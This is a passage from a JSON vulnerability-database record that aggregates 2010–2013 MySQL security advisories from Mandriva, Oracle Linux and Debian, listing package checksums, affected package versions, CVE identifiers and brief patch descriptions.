2009.1/i586/mysql-common-5.1.42-0.1mdv2009.1.i586.rpm\r\n 53894c10ef4d4e1384d55bf6d957d03b 2009.1/i586/mysql-doc-5.1.42-0.1mdv2009.1.i586.rpm\r\n af10d4d0e4efb516dc8228df3b6e0b04 2009.1/i586/mysql-max-5.1.42-0.1mdv2009.1.i586.rpm\r\n a950628d61d6941c5334040527b187b3 2009.1/i586/mysql-ndb-extra-5.1.42-0.1mdv2009.1.i586.rpm\r\n 5ef3d1368951afda87ce339ac3f40702 2009.1/i586/mysql-ndb-management-5.1.42-0.1mdv2009.1.i586.rpm\r\n 939043e470320d048c61ba731e58eedb 2009.1/i586/mysql-ndb-storage-5.1.42-0.1mdv2009.1.i586.rpm\r\n b575199f57235a93ab35f1d21b09106b 2009.1/i586/mysql-ndb-tools-5.1.42-0.1mdv2009.1.i586.rpm \r\n 7da4fea0d689631b6dc395cd5e80607e 2009.1/SRPMS/mysql-5.1.42-0.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n 83694bc1ab6c44f9ad081a385db8e137 2009.1/x86_64/lib64mysql16-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n efeb723e6c2f03878d3c7a98c70b08fc 2009.1/x86_64/lib64mysql-devel-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 36dd02fdbc2fbb752cee1d5dd80b2687 2009.1/x86_64/lib64mysql-static-devel-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 6d0f276c904e851e94e21fd33064bf84 2009.1/x86_64/mysql-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 783bb174310ca9f2d713f83cf6d1ef88 2009.1/x86_64/mysql-bench-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 4e63f4cc681ea7647a4a6d741b272a5b 2009.1/x86_64/mysql-client-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 0387ea642a706affc7ea43996786995b 2009.1/x86_64/mysql-common-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 57a3b2e0d7f89cf6c529317f96aa175d 2009.1/x86_64/mysql-doc-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 754919090d5355395a2f36025b0a6370 2009.1/x86_64/mysql-max-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n f7b6cff4ab3d2679107c8b5a1f0d1209 2009.1/x86_64/mysql-ndb-extra-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 526aec7bd783d54a9ba354098f88cb53 2009.1/x86_64/mysql-ndb-management-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 5c21900db14347e6e04979e9edeafc7c 2009.1/x86_64/mysql-ndb-storage-5.1.42-0.1mdv2009.1.x86_64.rpm\r\n 3011a3d4a3a83b563933909446c4e5a2 2009.1/x86_64/mysql-ndb-tools-5.1.42-0.1mdv2009.1.x86_64.rpm \r\n 7da4fea0d689631b6dc395cd5e80607e 2009.1/SRPMS/mysql-5.1.42-0.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2010.0:\r\n d8b966d905db88c7a5f78b350b2d197b 2010.0/i586/libmysql16-5.1.42-0.1mdv2010.0.i586.rpm\r\n 97890a292a3ad4bfbb9a12bbf4526b65 2010.0/i586/libmysql-devel-5.1.42-0.1mdv2010.0.i586.rpm\r\n abdfe57c2b25ff668b9f972efa4bec28 2010.0/i586/libmysql-static-devel-5.1.42-0.1mdv2010.0.i586.rpm\r\n de115ca3e80cb4a54970590eae0caf74 2010.0/i586/mysql-5.1.42-0.1mdv2010.0.i586.rpm\r\n b1af15f0e00bd2824092dac21d28a59d 2010.0/i586/mysql-bench-5.1.42-0.1mdv2010.0.i586.rpm\r\n 67beec0620551eb817d09e4dd2ed32a6 2010.0/i586/mysql-client-5.1.42-0.1mdv2010.0.i586.rpm\r\n e7979f8b6015a750d09593478cfcccc2 2010.0/i586/mysql-common-5.1.42-0.1mdv2010.0.i586.rpm\r\n 1e403dda77399cac91522b99c5a77a94 2010.0/i586/mysql-common-core-5.1.42-0.1mdv2010.0.i586.rpm\r\n c06bcd5a5c0acb43f270f5d7ace9d417 2010.0/i586/mysql-core-5.1.42-0.1mdv2010.0.i586.rpm\r\n 155d7edf8bf7760c644733671d04dda2 2010.0/i586/mysql-doc-5.1.42-0.1mdv2010.0.i586.rpm\r\n 8a7c42ba34efd2f8f1c74491f30bac7c 2010.0/i586/mysql-max-5.1.42-0.1mdv2010.0.i586.rpm\r\n 1d1eb124a30062c8229eacee947fab6b 2010.0/i586/mysql-ndb-extra-5.1.42-0.1mdv2010.0.i586.rpm\r\n e6133a08e26f7983f9cb9b7b67b75ca9 2010.0/i586/mysql-ndb-management-5.1.42-0.1mdv2010.0.i586.rpm\r\n 9372040b6d57968315f459a688a7fdab 2010.0/i586/mysql-ndb-storage-5.1.42-0.1mdv2010.0.i586.rpm\r\n a74218625b766d72ae38c2c1476cf3e6 2010.0/i586/mysql-ndb-tools-5.1.42-0.1mdv2010.0.i586.rpm \r\n ca60b4ffe2c95cb2db29a1a1e2523924 2010.0/SRPMS/mysql-5.1.42-0.1mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n 2930d2e7a334341d082bdec1c2ad261f 2010.0/x86_64/lib64mysql16-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 8ca967411d87705edcced52cc8281744 2010.0/x86_64/lib64mysql-devel-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 71af52b4b8cd37ec37141fe56b0bea1c 2010.0/x86_64/lib64mysql-static-devel-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n f8ff5f7cdd6054da4c81e3a741d9fb22 2010.0/x86_64/mysql-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 2b7d818a2edd120aba01e525fc51e647 2010.0/x86_64/mysql-bench-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 4896e7cfb9818e740de6586d6de18e8f 2010.0/x86_64/mysql-client-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 7904e902d0dd12a611fef6d4fe74d188 2010.0/x86_64/mysql-common-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 4ad977d5b0a3d8bd29d482f35ee41516 2010.0/x86_64/mysql-common-core-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 72ae82e587c92165a72467e30560b42f 2010.0/x86_64/mysql-core-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 7585cdb1a7065c522d3d71c91c13071f 2010.0/x86_64/mysql-doc-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 50936bad8898af9a9ecbab9f51a884c5 2010.0/x86_64/mysql-max-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 2ef542022c6437fa4df25e7b46c804dd 2010.0/x86_64/mysql-ndb-extra-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n b20519b0f4fb8ca438c8105a1305b45d 2010.0/x86_64/mysql-ndb-management-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 32d5eb57ba08af5420e44777ea2bbd98 2010.0/x86_64/mysql-ndb-storage-5.1.42-0.1mdv2010.0.x86_64.rpm\r\n 607848d02f7cffdf3169c7dbce65e75f 2010.0/x86_64/mysql-ndb-tools-5.1.42-0.1mdv2010.0.x86_64.rpm \r\n ca60b4ffe2c95cb2db29a1a1e2523924 2010.0/SRPMS/mysql-5.1.42-0.1mdv2010.0.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFLU3VUmqjQ0CJFipgRAmhhAJ91sCoRByeEVFdzAULLmfs0t6vOsACaArA+\r\nfPZMuPMkwgub9aN1Xva9v1Q=\r\n=2/XR\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2010-01-19T00:00:00", "title": "[ MDVSA-2010:012 ] mysql", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:33", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-4098", "CVE-2008-2079", "CVE-2009-4019"], "modified": "2010-01-19T00:00:00", "id": "SECURITYVULNS:DOC:23063", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23063", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:41:10", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "ia64", "packageFilename": "mysql-test-5.0.77-4.el5_4.2.ia64.rpm", "packageName": "mysql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "src", "packageFilename": "mysql-5.0.77-4.el5_4.2.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "src", "packageFilename": "mysql-5.0.77-4.el5_4.2.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "src", "packageFilename": "mysql-5.0.77-4.el5_4.2.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "i386", "packageFilename": "mysql-devel-5.0.77-4.el5_4.2.i386.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "i386", "packageFilename": "mysql-devel-5.0.77-4.el5_4.2.i386.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "x86_64", "packageFilename": "mysql-bench-5.0.77-4.el5_4.2.x86_64.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "i386", "packageFilename": "mysql-server-5.0.77-4.el5_4.2.i386.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "i386", "packageFilename": "mysql-5.0.77-4.el5_4.2.i386.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "i386", "packageFilename": "mysql-5.0.77-4.el5_4.2.i386.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "i386", "packageFilename": "mysql-5.0.77-4.el5_4.2.i386.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "x86_64", "packageFilename": "mysql-5.0.77-4.el5_4.2.x86_64.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "x86_64", "packageFilename": "mysql-server-5.0.77-4.el5_4.2.x86_64.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "ia64", "packageFilename": "mysql-5.0.77-4.el5_4.2.ia64.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "ia64", "packageFilename": "mysql-server-5.0.77-4.el5_4.2.ia64.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "x86_64", "packageFilename": "mysql-test-5.0.77-4.el5_4.2.x86_64.rpm", "packageName": "mysql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "i386", "packageFilename": "mysql-test-5.0.77-4.el5_4.2.i386.rpm", "packageName": "mysql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "ia64", "packageFilename": "mysql-devel-5.0.77-4.el5_4.2.ia64.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "i386", "packageFilename": "mysql-bench-5.0.77-4.el5_4.2.i386.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "ia64", "packageFilename": "mysql-bench-5.0.77-4.el5_4.2.ia64.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "x86_64", "packageFilename": "mysql-devel-5.0.77-4.el5_4.2.x86_64.rpm", "packageName": "mysql-devel", "operator": "lt"}], "description": "[5.0.77-4.2]\n- Add fixes for CVE-2009-4019, CVE-2009-4028, CVE-2009-4030\nResolves: #556505\n- Use non-expired certificates for SSL testing (upstream bug 50702)\n- Emit explicit error message if user tries to build RPM as root\n- Add comment suggesting disabling symbolic links in /etc/my.cnf ", "edition": 3, "reporter": "Oracle", "published": "2010-02-16T00:00:00", "title": "mysql security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2009-4019"], "modified": "2010-02-16T00:00:00", "id": "ELSA-2010-0109", "href": "http://linux.oracle.com/errata/ELSA-2010-0109.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:37:59", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "i386", "packageFilename": "mysql-bench-5.0.95-3.el5.i386.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "x86_64", "packageFilename": "mysql-bench-5.0.95-3.el5.x86_64.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "ia64", "packageFilename": "mysql-devel-5.0.95-3.el5.ia64.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "i386", "packageFilename": "mysql-devel-5.0.95-3.el5.i386.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "i386", "packageFilename": "mysql-devel-5.0.95-3.el5.i386.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "ia64", "packageFilename": "mysql-bench-5.0.95-3.el5.ia64.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "i386", "packageFilename": "mysql-server-5.0.95-3.el5.i386.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "ia64", "packageFilename": "mysql-server-5.0.95-3.el5.ia64.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "x86_64", "packageFilename": "mysql-server-5.0.95-3.el5.x86_64.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "x86_64", "packageFilename": "mysql-devel-5.0.95-3.el5.x86_64.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "i386", "packageFilename": "mysql-test-5.0.95-3.el5.i386.rpm", "packageName": "mysql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "ia64", "packageFilename": "mysql-test-5.0.95-3.el5.ia64.rpm", "packageName": "mysql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "x86_64", "packageFilename": "mysql-test-5.0.95-3.el5.x86_64.rpm", "packageName": "mysql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "x86_64", "packageFilename": "mysql-5.0.95-3.el5.x86_64.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "src", "packageFilename": "mysql-5.0.95-3.el5.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "src", "packageFilename": "mysql-5.0.95-3.el5.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "src", "packageFilename": "mysql-5.0.95-3.el5.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "i386", "packageFilename": "mysql-5.0.95-3.el5.i386.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "i386", "packageFilename": "mysql-5.0.95-3.el5.i386.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "i386", "packageFilename": "mysql-5.0.95-3.el5.i386.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "ia64", "packageFilename": "mysql-5.0.95-3.el5.ia64.rpm", "packageName": "mysql", "operator": "lt"}], "description": "[5.0.95-3]\r\n- Re-add patch for CVE-2009-4030, mistakenly removed in 5.0.95 rebase\r\nResolves: CVE-2012-4452\r\n \n[5.0.95-2]\r\n- Support rotation of mysqld log (though this is not enabled by default)\r\nResolves: #647223\r\n- Fix crash with EXPLAIN and prepared statements\r\nResolves: #654000\r\n- Adopt init script updates from the last Fedora init script (F-15)\r\nResolves: #703476", "edition": 3, "reporter": "Oracle", "published": "2013-01-11T00:00:00", "title": "mysql security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-4452", "CVE-2009-4030"], "modified": "2013-01-11T00:00:00", "id": "ELSA-2013-0121", "href": "http://linux.oracle.com/errata/ELSA-2013-0121.html", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:44:27", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "i386", "packageFilename": "mysql-server-4.1.22-2.el4_8.3.i386.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "x86_64", "packageFilename": "mysql-bench-4.1.22-2.el4_8.3.x86_64.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "src", "packageFilename": "mysql-4.1.22-2.el4_8.3.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "src", "packageFilename": "mysql-4.1.22-2.el4_8.3.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "src", "packageFilename": "mysql-4.1.22-2.el4_8.3.src.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "i386", "packageFilename": "mysql-devel-4.1.22-2.el4_8.3.i386.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "i386", "packageFilename": "mysql-4.1.22-2.el4_8.3.i386.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "i386", "packageFilename": "mysql-4.1.22-2.el4_8.3.i386.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "i386", "packageFilename": "mysql-4.1.22-2.el4_8.3.i386.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "ia64", "packageFilename": "mysql-bench-4.1.22-2.el4_8.3.ia64.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "x86_64", "packageFilename": "mysql-devel-4.1.22-2.el4_8.3.x86_64.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "x86_64", "packageFilename": "mysql-4.1.22-2.el4_8.3.x86_64.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "x86_64", "packageFilename": "mysql-server-4.1.22-2.el4_8.3.x86_64.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "ia64", "packageFilename": "mysql-server-4.1.22-2.el4_8.3.ia64.rpm", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "i386", "packageFilename": "mysql-bench-4.1.22-2.el4_8.3.i386.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "ia64", "packageFilename": "mysql-devel-4.1.22-2.el4_8.3.ia64.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "ia64", "packageFilename": "mysql-4.1.22-2.el4_8.3.ia64.rpm", "packageName": "mysql", "operator": "lt"}], "description": "[4.1.22-2.el4.3]\n- Add comment suggesting disabling symbolic links in /etc/my.cnf\n[4.1.22-2.el4.2]\n- Add fixes for CVE-2008-4098, CVE-2009-4030 (two successive attempts to fix\n DATA/INDEX DIRECTORY vulnerabilities) and CVE-2008-4456 (mysql command line\n client XSS flaw)\nResolves: #512255\n[4.1.22-2.el4.1]\n- Add fix for CVE-2009-2446 (format string vulnerability in COM_CREATE_DB and\n COM_DROP_DB processing)\nResolves: #512255 ", "edition": 3, "reporter": "Oracle", "published": "2010-02-16T00:00:00", "title": "mysql security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-2446", "CVE-2008-4456", "CVE-2009-4030", "CVE-2008-4098"], "modified": "2010-02-16T00:00:00", "id": "ELSA-2010-0110", "href": "http://linux.oracle.com/errata/ELSA-2010-0110.html", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:14:55", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny3", "arch": "all", "packageFilename": "mysql-client-5.0_5.0.51a-24+lenny3_all.deb", "packageName": "mysql-client-5.0", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "5.0.32-7etch12", "arch": "all", "packageFilename": "libmysqlclient15off_5.0.32-7etch12_all.deb", "packageName": "libmysqlclient15off", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny3", "arch": "all", "packageFilename": "libmysqlclient15-dev_5.0.51a-24+lenny3_all.deb", "packageName": "libmysqlclient15-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "5.0.32-7etch12", "arch": "all", "packageFilename": "mysql-server-5.0_5.0.32-7etch12_all.deb", "packageName": "mysql-server-5.0", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "5.0.32-7etch12", "arch": "all", "packageFilename": "mysql-server_5.0.32-7etch12_all.deb", "packageName": "mysql-server", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny3", "arch": "all", "packageFilename": "mysql-common_5.0.51a-24+lenny3_all.deb", "packageName": "mysql-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "5.0.32-7etch12", "arch": "all", "packageFilename": "mysql-common_5.0.32-7etch12_all.deb", "packageName": "mysql-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny3", "arch": "all", "packageFilename": "mysql-server-5.0_5.0.51a-24+lenny3_all.deb", "packageName": "mysql-server-5.0", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "5.0.32-7etch12", "arch": "all", "packageFilename": "mysql-client_5.0.32-7etch12_all.deb", "packageName": "mysql-client", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "5.0.32-7etch12", "arch": "all", "packageFilename": "libmysqlclient15-dev_5.0.32-7etch12_all.deb", "packageName": "libmysqlclient15-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny3", "arch": "all", "packageFilename": "mysql-dfsg-5.0_5.0.51a-24+lenny3_all.deb", "packageName": "mysql-dfsg-5.0", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny3", "arch": "all", "packageFilename": "mysql-client_5.0.51a-24+lenny3_all.deb", "packageName": "mysql-client", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "5.0.32-7etch12", "arch": "all", "packageFilename": "mysql-client-5.0_5.0.32-7etch12_all.deb", "packageName": "mysql-client-5.0", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "5.0.32-7etch12", "arch": "all", "packageFilename": "mysql-server-4.1_5.0.32-7etch12_all.deb", "packageName": "mysql-server-4.1", "operator": "lt"}, {"OS": "Debian", "OSVersion": "4", "packageVersion": "5.0.32-7etch12", "arch": "all", "packageFilename": "mysql-dfsg-5.0_5.0.32-7etch12_all.deb", "packageName": "mysql-dfsg-5.0", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny3", "arch": "all", "packageFilename": "libmysqlclient15off_5.0.51a-24+lenny3_all.deb", "packageName": "libmysqlclient15off", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "5.0.51a-24+lenny3", "arch": "all", "packageFilename": "mysql-server_5.0.51a-24+lenny3_all.deb", "packageName": "mysql-server", "operator": "lt"}], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1997-1 security@debian.org\nhttp://www.debian.org/security/ Giuseppe Iuculano\nFebruary 14, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : mysql-dfsg-5.0\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2009-4019 CVE-2009-4030 CVE-2009-4484\n\nSeveral vulnerabilities have been discovered in the MySQL\ndatabase server.\nThe Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\n\nCVE-2009-4019\n\nDomas Mituzas discovered that mysqld does not properly handle errors during\nexecution of certain SELECT statements with subqueries, and does not preserve\ncertain null_value flags during execution of statements that use the\nGeomFromWKB function, which allows remote authenticated users to cause a\ndenial of service (daemon crash) via a crafted statement.\n\n\nCVE-2009-4030\n\nSergei Golubchik discovered that MySQL allows local users to bypass certain\nprivilege checks by calling CREATE TABLE on a MyISAM table with modified\nDATA 